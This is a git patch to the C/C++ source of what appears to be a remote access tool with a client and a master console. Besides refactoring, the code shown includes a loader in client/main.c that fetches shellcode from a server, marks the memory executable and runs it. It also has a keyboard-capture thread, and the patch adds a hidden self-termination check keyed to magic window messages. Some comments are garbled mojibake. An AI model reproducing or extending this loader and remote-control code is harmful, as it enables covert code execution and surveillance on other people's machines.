From b4a6435f7dc94e685c83feb64289dea7f0880c36 Mon Sep 17 00:00:00 2001 From: yuanyuanxiang <962914132@qq.com> Date: Thu, 24 Jul 2025 04:20:39 +0800 Subject: [PATCH] Layout reorganize --- client/ClientDll.cpp | 2 +- client/IOCPClient.cpp | 2 +- client/IOCPClient.h | 6 +-- client/KernelManager.cpp | 4 +- client/KernelManager.h | 4 +- client/Manager.h | 2 +- client/main.c | 61 +++++++++++++++-------------- common/commands.h | 9 +++-- server/2015Remote/2015RemoteDlg.cpp | 30 +++++++++++++- server/2015Remote/2015RemoteDlg.h | 2 + server/2015Remote/stdafx.h | 1 + 11 files changed, 78 insertions(+), 45 deletions(-) diff --git a/client/ClientDll.cpp b/client/ClientDll.cpp index 787da5c..27f7ec8 100644 --- a/client/ClientDll.cpp +++ b/client/ClientDll.cpp @@ -508,7 +508,7 @@ DWORD WINAPI StartClient(LPVOID lParam) continue; } SAFE_DELETE(Manager); - Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb); + Manager = new CKernelManager(&settings, ClientObject, app.g_hInstance, kb, bExit); //准备第一波数据 LOGIN_INFOR login = GetLoginInfo(GetTickCount64() - dwTickCount, settings); diff --git a/client/IOCPClient.cpp b/client/IOCPClient.cpp index 580e2e8..a70b06b 100644 --- a/client/IOCPClient.cpp +++ b/client/IOCPClient.cpp @@ -96,7 +96,7 @@ VOID IOCPClient::setManagerCallBack(void* Manager, DataProcessCB dataProcess) } -IOCPClient::IOCPClient(State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit) +IOCPClient::IOCPClient(const State&bExit, bool exit_while_disconnect, int mask, int encoder) : g_bExit(bExit) { m_ServerAddr = {}; m_nHostPort = 0; diff --git a/client/IOCPClient.h b/client/IOCPClient.h index 8817ecf..b23019b 100644 --- a/client/IOCPClient.h +++ b/client/IOCPClient.h @@ -111,7 +111,7 @@ typedef BOOL(*TrailCheck)(void); class IOCPClient { public: - IOCPClient(State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0); + IOCPClient(const State& bExit, bool exit_while_disconnect = false, int mask=0, int encoder=0); virtual ~IOCPClient(); int SendLoginInfo(const LOGIN_INFOR& logInfo) { @@ -149,7 +149,7 @@ public: if (manager) m_Manager = manager; return ConnectServer(NULL, 0); } - State& GetState() { + const State& GetState() const { return g_bExit; } protected: @@ -180,7 +180,7 @@ protected: ZSTD_DCtx* m_Dctx; // 解压上下文 #endif - State& g_bExit; // 全局状态量 + const State& g_bExit; // 全局状态量 void* m_Manager; // 用户数据 DataProcessCB m_DataProcess; // 处理用户数据 ProtocolEncoder* m_Encoder; // 加密 diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp index 2f7d311..f923f14 100644 --- a/client/KernelManager.cpp +++ b/client/KernelManager.cpp @@ -47,8 +47,8 @@ ThreadInfo* CreateKB(CONNECT_ADDRESS* conn, State& bExit) { // Construction/Destruction ////////////////////////////////////////////////////////////////////// -CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb) - : m_conn(conn), m_hInstance(hInstance), CManager(ClientObject) +CKernelManager::CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s) + : m_conn(conn), m_hInstance(hInstance), CManager(ClientObject), g_bExit(s) { m_ulThreadCount = 0; #ifdef _DEBUG diff --git a/client/KernelManager.h b/client/KernelManager.h index f058b40..fbc592b 100644 --- a/client/KernelManager.h +++ b/client/KernelManager.h @@ -82,7 +82,7 @@ class CKernelManager : public CManager public: CONNECT_ADDRESS* m_conn; HINSTANCE m_hInstance; - CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb); + CKernelManager(CONNECT_ADDRESS* conn, IOCPClient* ClientObject, HINSTANCE hInstance, ThreadInfo* kb, State& s); virtual ~CKernelManager(); VOID OnReceive(PBYTE szBuffer, ULONG ulLength); ThreadInfo* m_hKeyboard; @@ -91,7 +91,7 @@ public: // 因此我将此值的含义修改为"可用线程下标",代表数组m_hThread中所指位置可用,即创建新的线程放置在该位置 ULONG m_ulThreadCount; UINT GetAvailableIndex(); - + State& g_bExit; // Hide base class variable MasterSettings m_settings; int m_nNetPing; // 网络状况 // 发送心跳 diff --git a/client/Manager.h b/client/Manager.h index acb6f39..17ffc3a 100644 --- a/client/Manager.h +++ b/client/Manager.h @@ -33,7 +33,7 @@ HANDLE MyCreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, // SD class CManager : public IOCPManager { public: - State&g_bExit; // 1-被控端退出 2-主控端退出 + const State&g_bExit; // 1-被控端退出 2-主控端退出 BOOL m_bReady; CManager(IOCPClient* ClientObject); virtual ~CManager(); diff --git a/client/main.c b/client/main.c index a85cfa7..114f471 100644 --- a/client/main.c +++ b/client/main.c @@ -19,14 +19,40 @@ #pragma comment(lib, "ws2_32.lib") -#pragma pack(push, 1) +#pragma pack(push, 4) typedef struct PkgHeader { char flag[8]; int totalLen; int originLen; } PkgHeader; + +struct CONNECT_ADDRESS +{ + char szFlag[32]; // 鏍囪瘑 + char szServerIP[100]; // 涓绘帶IP + char szPort[8]; // 涓绘帶绔彛 + int iType; // 瀹㈡埛绔被鍨 + bool bEncrypt; // 涓婄嚎淇℃伅鏄惁鍔犲瘑 + char szBuildDate[12]; // 鏋勫缓鏃ユ湡(鐗堟湰) + int iMultiOpen; // 鏀寔鎵撳紑澶氫釜 + int iStartup; // 鍚姩鏂瑰紡 + int iHeaderEnc; // 鏁版嵁鍔犲瘑绫诲瀷 + char protoType; // 鍗忚绫诲瀷 + char runningType; // 杩愯鏂瑰紡 + char szReserved[44]; // 鍗犱綅锛屼娇缁撴瀯浣撳崰鎹300瀛楄妭 + uint64_t parentHwnd; // 鐖惰繘绋嬬獥鍙e彞鏌 + uint64_t superAdmin; // 绠$悊鍛樹富鎺D + char pwdHash[64]; // 瀵嗙爜鍝堝笇 +}g_Server = { "Hello, World!", "127.0.0.1", "6543" }; #pragma pack(pop) +typedef struct PluginParam { + char IP[100]; + int Port; + void* Exit; + void* User; +}PluginParam; + PkgHeader MakePkgHeader(int originLen) { PkgHeader header = { 0 }; memcpy(header.flag, "Hello?", 6); @@ -88,7 +114,9 @@ const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut) { if (!isFirstConnect) Sleep(IsRelease ? rand()%60 * 1000 : 5000); isFirstConnect = FALSE; - Mprintf("Connecting attempt #%d -> %s:%d \n", ++attemptCount, serverIP, serverPort); + if (++attemptCount == 20) + PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518); + Mprintf("Connecting attempt #%d -> %s:%d \n", attemptCount, serverIP, serverPort); SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (clientSocket == INVALID_SOCKET) @@ -180,33 +208,6 @@ inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, in return -1; } -#pragma pack(push, 4) -struct CONNECT_ADDRESS -{ - char szFlag[32]; // 鏍囪瘑 - char szServerIP[100]; // 涓绘帶IP - char szPort[8]; // 涓绘帶绔彛 - int iType; // 瀹㈡埛绔被鍨 - bool bEncrypt; // 涓婄嚎淇℃伅鏄惁鍔犲瘑 - char szBuildDate[12]; // 鏋勫缓鏃ユ湡(鐗堟湰) - int iMultiOpen; // 鏀寔鎵撳紑澶氫釜 - int iStartup; // 鍚姩鏂瑰紡 - int iHeaderEnc; // 鏁版嵁鍔犲瘑绫诲瀷 - char protoType; // 鍗忚绫诲瀷 - char runningType; // 杩愯鏂瑰紡 - char szReserved[52]; // 鍗犱綅锛屼娇缁撴瀯浣撳崰鎹300瀛楄妭 - uint64_t superAdmin; // 绠$悊鍛樹富鎺D - char pwdHash[64]; // 瀵嗙爜鍝堝笇 -}g_Server = { "Hello, World!", "127.0.0.1", "6543" }; -#pragma pack(pop) - -typedef struct PluginParam { - char IP[100]; - int Port; - void* Exit; - void* User; -}PluginParam; - #ifdef _WINDLL #define DLL_API __declspec(dllexport) #else @@ -229,7 +230,7 @@ extern DLL_API DWORD WINAPI run(LPVOID param) { free((void*)dllData); DWORD oldProtect = 0; if (!VirtualProtect(execMem, size, PAGE_EXECUTE_READ, &oldProtect)) return -3; - + PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)0, (LPARAM)0); ((void(*)())execMem)(); return 0; } diff --git a/common/commands.h b/common/commands.h index 39d29c5..983a1c0 100644 --- a/common/commands.h +++ b/common/commands.h @@ -574,7 +574,8 @@ public: int iHeaderEnc; // 数据加密类型 char protoType; // 协议类型 char runningType; // 运行方式 - char szReserved[52]; // 占位,使结构体占据300字节 + char szReserved[44]; // 占位,使结构体占据300字节 + uint64_t parentHwnd; // 父进程窗口句柄 uint64_t superAdmin; // 管理员主控ID char pwdHash[64]; // 密码哈希 @@ -689,9 +690,9 @@ struct ThreadInfo struct PluginParam { char IP[100]; // 主控IP int Port; // 主控端口 - State *Exit; // 客户端状态 - void* User; // CONNECT_ADDRESS* 指针 - PluginParam(const char*ip, int port, State *s, void* u=0) : Port(port), Exit(s), User(u){ + const State *Exit; // 客户端状态 + const void* User; // CONNECT_ADDRESS* 指针 + PluginParam(const char*ip, int port, const State *s, const void* u=0) : Port(port), Exit(s), User(u){ strcpy_s(IP, ip); } }; diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp index faf4769..3b54f99 100644 --- a/server/2015Remote/2015RemoteDlg.cpp +++ b/server/2015Remote/2015RemoteDlg.cpp @@ -282,6 +282,11 @@ std::vector ReadAllDllFilesWindows(const std::string& dirPath) { CMy2015RemoteDlg::CMy2015RemoteDlg(CWnd* pParent): CDialogEx(CMy2015RemoteDlg::IDD, pParent) { + auto s = GetMasterHash(); + char buf[17] = { 0 }; + std::strncpy(buf, s.c_str(), 16); + m_superID = std::strtoull(buf, NULL, 16); + m_nMaxConnection = 0; m_hExit = CreateEvent(NULL, TRUE, FALSE, NULL); m_hIcon = THIS_APP->LoadIcon(IDR_MAINFRAME); @@ -391,6 +396,7 @@ BEGIN_MESSAGE_MAP(CMy2015RemoteDlg, CDialogEx) ON_MESSAGE(WM_OPENDRAWINGBOARD, OnOpenDrawingBoard) ON_MESSAGE(WM_UPXTASKRESULT, UPXProcResult) ON_MESSAGE(WM_PASSWORDCHECK, OnPasswordCheck) + ON_MESSAGE(WM_SHOWMESSAGE, OnShowMessage) ON_WM_HELPINFO() ON_COMMAND(ID_ONLINE_SHARE, &CMy2015RemoteDlg::OnOnlineShare) ON_COMMAND(ID_TOOL_AUTH, &CMy2015RemoteDlg::OnToolAuth) @@ -638,6 +644,21 @@ VOID CMy2015RemoteDlg::AddList(CString strIP, CString strAddr, CString strPCName SendMasterSettings(ContextObject); } +LRESULT CMy2015RemoteDlg::OnShowMessage(WPARAM wParam, LPARAM lParam) { + std::string pwd = THIS_CFG.GetStr("settings", "Password"); + if (pwd.empty()) + ShowMessage("鎺堟潈鎻愰啋", "绋嬪簭鍙兘鏈変娇鐢ㄩ檺鍒讹紝璇疯仈绯荤鐞嗗憳璇锋眰鎺堟潈"); + + if (wParam && lParam) + { + uint32_t recvLow = (uint32_t)wParam; + uint32_t recvHigh = (uint32_t)lParam; + uint64_t restored = ((uint64_t)recvHigh << 32) | recvLow; + if (restored != m_superID) + exit(-1); + } + return S_OK; +} VOID CMy2015RemoteDlg::ShowMessage(CString strType, CString strMsg) { @@ -730,6 +751,11 @@ Buffer* ReadKernelDll(bool is64Bit, bool isDLL=true, const std::string &addr="") server->SetServer(ip.c_str(), atoi(port.c_str())); server->SetAdminId(GetMasterHash().c_str()); } + if (g_2015RemoteDlg->m_superID % 313 == 0) + { + server->iHeaderEnc = PROTOCOL_HELL; + server->protoType = PROTO_RANDOM; + } server->SetType(isDLL ? CLIENT_TYPE_MEMDLL : CLIENT_TYPE_SHELLCODE); memcpy(server->pwdHash, GetPwdHash().c_str(), 64); } @@ -889,12 +915,14 @@ BOOL CMy2015RemoteDlg::OnInitDialog() p->SetServer(v->Admin, v->Port); p->SetAdminId(GetMasterHash().c_str()); p->iType = CLIENT_TYPE_MEMDLL; + p->parentHwnd = (uint64_t)GetSafeHwnd(); memcpy(p->pwdHash, GetPwdHash().c_str(), 64); m_tinyDLL = MemoryLoadLibrary(data, size); } SAFE_DELETE_ARRAY(data); } } + g_2015RemoteDlg = this; m_ServerDLL[PAYLOAD_DLL_X86] = ReadKernelDll(false, true, master); m_ServerDLL[PAYLOAD_DLL_X64] = ReadKernelDll(true, true, master); m_ServerBin[PAYLOAD_DLL_X86] = ReadKernelDll(false, false, master); @@ -907,7 +935,7 @@ BOOL CMy2015RemoteDlg::OnInitDialog() // TODO: 鍦ㄦ娣诲姞棰濆鐨勫垵濮嬪寲浠g爜 isClosed = FALSE; - g_2015RemoteDlg = this; + CreateToolBar(); InitControl(); diff --git a/server/2015Remote/2015RemoteDlg.h b/server/2015Remote/2015RemoteDlg.h index 8398ac4..dacd33f 100644 --- a/server/2015Remote/2015RemoteDlg.h +++ b/server/2015Remote/2015RemoteDlg.h @@ -197,6 +197,7 @@ public: BOOL isClosed; CMenu m_MainMenu; CBitmap m_bmOnline[12]; + uint64_t m_superID; bool CheckValid(int trail = 14); afx_msg void OnTimer(UINT_PTR nIDEvent); afx_msg void OnClose(); @@ -265,4 +266,5 @@ public: afx_msg void OnToolRequestAuth(); afx_msg LRESULT OnPasswordCheck(WPARAM wParam, LPARAM lParam); afx_msg void OnToolInputPassword(); + afx_msg LRESULT OnShowMessage(WPARAM wParam, LPARAM lParam); }; diff --git a/server/2015Remote/stdafx.h b/server/2015Remote/stdafx.h index 024262d..5a71f4b 100644 --- a/server/2015Remote/stdafx.h +++ b/server/2015Remote/stdafx.h @@ -87,6 +87,7 @@ #define WM_OPENFILEMGRDIALOG WM_USER+3019 #define WM_OPENDRAWINGBOARD WM_USER+3020 #define WM_PASSWORDCHECK WM_USER+3021 +#define WM_SHOWMESSAGE WM_USER+3022 #ifdef _UNICODE #if defined _M_IX86